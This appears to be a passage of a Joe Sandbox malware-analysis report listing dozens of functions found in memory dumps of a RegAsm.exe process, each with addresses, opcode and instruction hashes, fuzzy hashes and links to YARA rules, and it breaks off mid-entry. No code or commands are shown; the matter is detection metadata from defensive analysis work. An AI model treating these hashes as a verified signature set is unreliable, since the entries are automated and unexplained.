                                                                                                                                    • Opcode ID: 6c40e22eba143d845b7046dc54f9fd4e85bd6226a48161be41774415c4473b61
                                                                                                                                    • Instruction ID: 2bc085b1c97fe437f277f4ae9ea9c5e60c4335215b4425c1ae4512888674e172
                                                                                                                                    • Opcode Fuzzy Hash: 6c40e22eba143d845b7046dc54f9fd4e85bd6226a48161be41774415c4473b61
                                                                                                                                    • Instruction Fuzzy Hash: 97F05535204B0447D338A029D48AAAAB3AAF7C8320F944836E00DC3A80CB28EC06C2A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC52F0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2e65b749256509faff0da4098ba6daf822c2a29e00391a6acda9f4ef89de5770
                                                                                                                                    • Instruction ID: c27a49710f63e429f497cab4f989301f1874a764cd4ac433e60260e95c9d6a50
                                                                                                                                    • Opcode Fuzzy Hash: 2e65b749256509faff0da4098ba6daf822c2a29e00391a6acda9f4ef89de5770
                                                                                                                                    • Instruction Fuzzy Hash: B7F0ECF5E001159FC740EBBCD5146DEB7F4EF49250F608065E61AD7710EB305A008BE2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06858FC0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2ac54729604ecf870499387904ddd07c1731fea5ba42c961cffcca7ad207e883
                                                                                                                                    • Instruction ID: c1d42be6ade4eb53da7fb3315be30114eb67f22cd9792862fc74b4cc05c61b6a
                                                                                                                                    • Opcode Fuzzy Hash: 2ac54729604ecf870499387904ddd07c1731fea5ba42c961cffcca7ad207e883
                                                                                                                                    • Instruction Fuzzy Hash: 84F0CDB4C09269DFDB00CFA0C8061ADBFB1EB1A305F0041D7E846E7350E6748A41CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553F431 Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 451d5c5ae781d7311cd5388e1e631421df67ed7b3540809aeaa645642c038dbc
                                                                                                                                    • Instruction ID: 8aa1842ea734d783457500acb08675664c0533f2a1ce0a8faa2a0ed57fe712b3
                                                                                                                                    • Opcode Fuzzy Hash: 451d5c5ae781d7311cd5388e1e631421df67ed7b3540809aeaa645642c038dbc
                                                                                                                                    • Instruction Fuzzy Hash: 0FF0EC312493915BC717533659005797FEA5FD7164B0804BBD949C7656DA18D80A8391
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5CCA Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: db14307336876d0744e8e25b4adaca1f583169a01366110f59faa9533fe19147
                                                                                                                                    • Instruction ID: 3422f4a4507b4293c195aa314ac499c70d6e9edde8d8739092d6ba3503cb7263
                                                                                                                                    • Opcode Fuzzy Hash: db14307336876d0744e8e25b4adaca1f583169a01366110f59faa9533fe19147
                                                                                                                                    • Instruction Fuzzy Hash: A1F082B1A04715AFC710DBACD460B9F7FF9EB45620F1054AAE009C7285DBB56C008F92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169CA04 Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 43a1ba7f48e66e71ea416706328a64fc35f0b3814ee63dc382c1a0bc02d2f150
                                                                                                                                    • Instruction ID: 4a4c83920e85a022eb503aa021e82cc2c4385f790a995ee22c849848de4b7216
                                                                                                                                    • Opcode Fuzzy Hash: 43a1ba7f48e66e71ea416706328a64fc35f0b3814ee63dc382c1a0bc02d2f150
                                                                                                                                    • Instruction Fuzzy Hash: 47F01C303500659BCF08E76DD8A4A6A769BAB89B01F01846EA10ACB3A5CE65DC018795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169CFA0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f6cb192662f2d97d6a8fc39e8579012b73d3ea3e24370ed2ce7d4b8014da0547
                                                                                                                                    • Instruction ID: 0ffa529697231b8df9b3fcf4504a89c5457f06760bd265acd0ac123bdb70bd23
                                                                                                                                    • Opcode Fuzzy Hash: f6cb192662f2d97d6a8fc39e8579012b73d3ea3e24370ed2ce7d4b8014da0547
                                                                                                                                    • Instruction Fuzzy Hash: 00F0E531B806192BDB14AB7ED900A9EBF9EEF80660B008A75E004CB354EF35DD0587D4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169B0B8 Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: efbad2d9f0867dbc3294101442c3f8ef225c3075428f59e1c2a84251b81e786b
                                                                                                                                    • Instruction ID: 0eff4ce90500a5a075c64227a6ffbfdb4c82566c81dbabafadc34559da6dec4c
                                                                                                                                    • Opcode Fuzzy Hash: efbad2d9f0867dbc3294101442c3f8ef225c3075428f59e1c2a84251b81e786b
                                                                                                                                    • Instruction Fuzzy Hash: 45E092627401026BFB04A57BEE11B76628FCBC0551F19843DD505CB284DE14DC0342A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169D298 Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f6f867ad00189a81ebb7933c563efe893d07b4a2159f0f451c3df28354cd06a4
                                                                                                                                    • Instruction ID: de373e761260e05e87103c678054a1472770e801230bcdf0bd90fa0b88525c3e
                                                                                                                                    • Opcode Fuzzy Hash: f6f867ad00189a81ebb7933c563efe893d07b4a2159f0f451c3df28354cd06a4
                                                                                                                                    • Instruction Fuzzy Hash: 03F03636200159AFCF055F45C804C9D7FAAFBC92547098069F6458B220C631D9259B90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5C68 Relevance: .0, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e5fb40fcb2bcc6ad53720f824ec5470d12a3b0d1cafa30e619102cd143dce551
                                                                                                                                    • Instruction ID: 53169f5f76d48b37e56b7398db0c38404c8b9dff58b209c369d8427e70a92a1b
                                                                                                                                    • Opcode Fuzzy Hash: e5fb40fcb2bcc6ad53720f824ec5470d12a3b0d1cafa30e619102cd143dce551
                                                                                                                                    • Instruction Fuzzy Hash: 2BF0A07130020A5BD610B7ADA420A5E77EEFBC9661710446AE505CB388DFA1EC064BA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169B0C8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5a4b9ad43d170a70503a60d4cd0d3c91227f3da0790bc536f89ca5bceb8cecec
                                                                                                                                    • Instruction ID: 005700d055c727840fa51a5a3d08c4ac79e784b5f36091a38cacd1a82a38354f
                                                                                                                                    • Opcode Fuzzy Hash: 5a4b9ad43d170a70503a60d4cd0d3c91227f3da0790bc536f89ca5bceb8cecec
                                                                                                                                    • Instruction Fuzzy Hash: 42E04F62B002162BBF18B57FAD11E3B72DF8BD4691B0A843DD505CB394EE60DC0382A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05534428 Relevance: .0, Instructions: 30COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4fae928b83916a09d186f13a5f450ec71d98e33a4dc5389b784aa5d28964a41f
                                                                                                                                    • Instruction ID: f05e192ce327d8ea5f8c36c47f56eaeb69bd85d95fa0354a2a8d968ede30d088
                                                                                                                                    • Opcode Fuzzy Hash: 4fae928b83916a09d186f13a5f450ec71d98e33a4dc5389b784aa5d28964a41f
                                                                                                                                    • Instruction Fuzzy Hash: DFF03A31304A108FC729EF28E445A1A73E6FF89704B004569D1068B770DB74EC46CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC2DF9 Relevance: .0, Instructions: 30COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7b655e89c514ccf7b763a347939fbc700c0a55b7ee553c7555f90331a1a075c7
                                                                                                                                    • Instruction ID: bc6d20a891f487965a587ffb10848bac9c8ee8b9a0e8398e04b4185537b6a522
                                                                                                                                    • Opcode Fuzzy Hash: 7b655e89c514ccf7b763a347939fbc700c0a55b7ee553c7555f90331a1a075c7
                                                                                                                                    • Instruction Fuzzy Hash: EFF06D74105216EFCB09FFA0E86956D7BB2FB443027000A69E5028B3B5DB791C09CB82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01694B28 Relevance: .0, Instructions: 30COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e4675cc9ba48855a8fc9737f912e76e1de3e70b126b6fb3d1b2716908028ae04
                                                                                                                                    • Instruction ID: fdff5a97877245f8955d734483ebaa2d401cb6a9d15d0465725596ccaea8caeb
                                                                                                                                    • Opcode Fuzzy Hash: e4675cc9ba48855a8fc9737f912e76e1de3e70b126b6fb3d1b2716908028ae04
                                                                                                                                    • Instruction Fuzzy Hash: CAE0DF322842218BDB114A6CC901BE673ACDB147A5F024176EC04EBF61DB6AEC83C3D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01694B38 Relevance: .0, Instructions: 30COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 26d6c48b15ed40cc9699ddab11d6171420cd3d1c8509ce1d6208b961846690f5
                                                                                                                                    • Instruction ID: f8de190c9dff537e02ccf4dc89afc1232998b1204c65ac5defbfe59d6c55e1af
                                                                                                                                    • Opcode Fuzzy Hash: 26d6c48b15ed40cc9699ddab11d6171420cd3d1c8509ce1d6208b961846690f5
                                                                                                                                    • Instruction Fuzzy Hash: 6EE09A327402258BDB119A7DD900AA6B39D9F44BA5B00807AEA08CB761EF31DC82C3D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC75B0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a266a68bb75d81f0d0540fe415d53017c6a2b33ee51ed6bf9eb7c51bdfd7635a
                                                                                                                                    • Instruction ID: 68f1df1d8c28bbd8b3fcbbf5de534fc56fea462f6fcd516956b05a2ef1a550ec
                                                                                                                                    • Opcode Fuzzy Hash: a266a68bb75d81f0d0540fe415d53017c6a2b33ee51ed6bf9eb7c51bdfd7635a
                                                                                                                                    • Instruction Fuzzy Hash: D8E022F470420C7FC321926564203EA2BA54B9A220B103047F6318B785ED15CC828BF2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553C603 Relevance: .0, Instructions: 28COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f09e8f83e2f37130a9ee5b86f903cb2d090f310485e368a4163f8ab9d2bac0eb
                                                                                                                                    • Instruction ID: 22b3a0e3ec2c2d9ae3e7706a42f421ced134a2249b9de33c506d3b21d78fd17f
                                                                                                                                    • Opcode Fuzzy Hash: f09e8f83e2f37130a9ee5b86f903cb2d090f310485e368a4163f8ab9d2bac0eb
                                                                                                                                    • Instruction Fuzzy Hash: 25F03034E0530CAFCF05DBB8D8544ADBFB5AF4A300F1081EAE514D7315DA345A458F91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685ADF8 Relevance: .0, Instructions: 28COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4deff7df5ca37caa0a8974ca1c19ae70f9cbfc6ff0ea18eaf06e66bd5d9179a9
                                                                                                                                    • Instruction ID: 8780afdf7aed32a32fec8468608d1034e832fe5e4f2281d451ce25f88cfd31f5
                                                                                                                                    • Opcode Fuzzy Hash: 4deff7df5ca37caa0a8974ca1c19ae70f9cbfc6ff0ea18eaf06e66bd5d9179a9
                                                                                                                                    • Instruction Fuzzy Hash: C6E092312042126FC7506A9AA448E9EBADEFBCA391B00442DE20FC7A41CAA1580587A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 055368B0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a189d98f9671b022a88ea664583d5f3f57b8b0d4bbe113fa375b86293d3a8ae9
                                                                                                                                    • Instruction ID: e00454b4d3b4aeb9ab425fe17b333bd2b81318e98f06e8f596d4eeadd5dfd428
                                                                                                                                    • Opcode Fuzzy Hash: a189d98f9671b022a88ea664583d5f3f57b8b0d4bbe113fa375b86293d3a8ae9
                                                                                                                                    • Instruction Fuzzy Hash: 0CE092B1581109AFC700EBA8D945BDEBBB9F781214F10866AA405E3210DB345E01DB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC8B08 Relevance: .0, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 687cc383418c8855184d9e4ec712c26595a06c3ee26741c693bb43b1275ef268
                                                                                                                                    • Instruction ID: e0e022bce882f8f942f53b29ca8c9dde6403a900fc8cebe251a24a3df2f4cc22
                                                                                                                                    • Opcode Fuzzy Hash: 687cc383418c8855184d9e4ec712c26595a06c3ee26741c693bb43b1275ef268
                                                                                                                                    • Instruction Fuzzy Hash: 7BE020F1204354BFC625E22874116E96F975FC9720719088BE6508B345CE57DD4557B3
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01699E1F Relevance: .0, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 08c93c9f6236791081ac05e288b32f52ead5508c18ed2f3579ce27650418682c
                                                                                                                                    • Instruction ID: a9a8c6c5e0322788b902d868cdcbf2c3a5478485f1ba4f0873b5e5f8ffaff24b
                                                                                                                                    • Opcode Fuzzy Hash: 08c93c9f6236791081ac05e288b32f52ead5508c18ed2f3579ce27650418682c
                                                                                                                                    • Instruction Fuzzy Hash: C0E068326409058BE7017A28D8093DD33A4EBC120AF430277E104AB744DF38C84283D2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685C180 Relevance: .0, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7fd0c909c45c6481c2513e3e7bd411ae840058874b1b20156546ad924da42832
                                                                                                                                    • Instruction ID: 5588fc987adc19346e79eafd307335c8809336529069fc262b223f91198b1644
                                                                                                                                    • Opcode Fuzzy Hash: 7fd0c909c45c6481c2513e3e7bd411ae840058874b1b20156546ad924da42832
                                                                                                                                    • Instruction Fuzzy Hash: 36F09A34504B048FD725EF66E448516BBF6FB8C301700C62EE88B82E50DBB0E549CF84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5CD8 Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 723d7b2d850df65d2bb52e15e871c239b19983b817300708be7a8de4cf4cc989
                                                                                                                                    • Instruction ID: 16905398977da6ec791fe26c57167206a39cdd9f32afef5286959d17585d7915
                                                                                                                                    • Opcode Fuzzy Hash: 723d7b2d850df65d2bb52e15e871c239b19983b817300708be7a8de4cf4cc989
                                                                                                                                    • Instruction Fuzzy Hash: 95E06D71A00619AFCB14DB9CE454B5FBBF9EB44A20F108469E409C7288CBB4A8018F81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01696FB9 Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f19f33f7a921d73933e5680437c031c3682831e8f0f2badb777dea3304bf5e6b
                                                                                                                                    • Instruction ID: 4944310c3e2807039e15ecaf941e563f6c9237d378b62557e6bec490edf19023
                                                                                                                                    • Opcode Fuzzy Hash: f19f33f7a921d73933e5680437c031c3682831e8f0f2badb777dea3304bf5e6b
                                                                                                                                    • Instruction Fuzzy Hash: 48E0ED7090A3049FD724DF98DD99BEABBB9EB06300F0450EA9408A72A2DB305900C759
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01693E10 Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0f5cfbf5f6813345299da73a994044a779b52460a43256cb489a4885201059b3
                                                                                                                                    • Instruction ID: d6b81029fc2e407aa869dd6f1e98a4544f062abd511955010b6b7dc573592f88
                                                                                                                                    • Opcode Fuzzy Hash: 0f5cfbf5f6813345299da73a994044a779b52460a43256cb489a4885201059b3
                                                                                                                                    • Instruction Fuzzy Hash: 62E0DF3094A204DBDB14DF9DDD887FABBBEEB4A300F4064A9A10EA32A0DB304900C754
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685C120 Relevance: .0, Instructions: 25COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 93bfe747c143bbbef757ecf1a818780c3a43818659834d3507131fa28911cf5a
                                                                                                                                    • Instruction ID: a0ba700890a4bf7179924d48e2822b7908a5902fa1014e1d8196d5e306d99b21
                                                                                                                                    • Opcode Fuzzy Hash: 93bfe747c143bbbef757ecf1a818780c3a43818659834d3507131fa28911cf5a
                                                                                                                                    • Instruction Fuzzy Hash: C0E065312047554FC711A72DE5187AEBBE6EFC5354F04052DE2478BB55CBB1A8058791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5300 Relevance: .0, Instructions: 24COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4d5c3999519ac7d1739c708efc1436eb46a335379da378755c4c180d12254d02
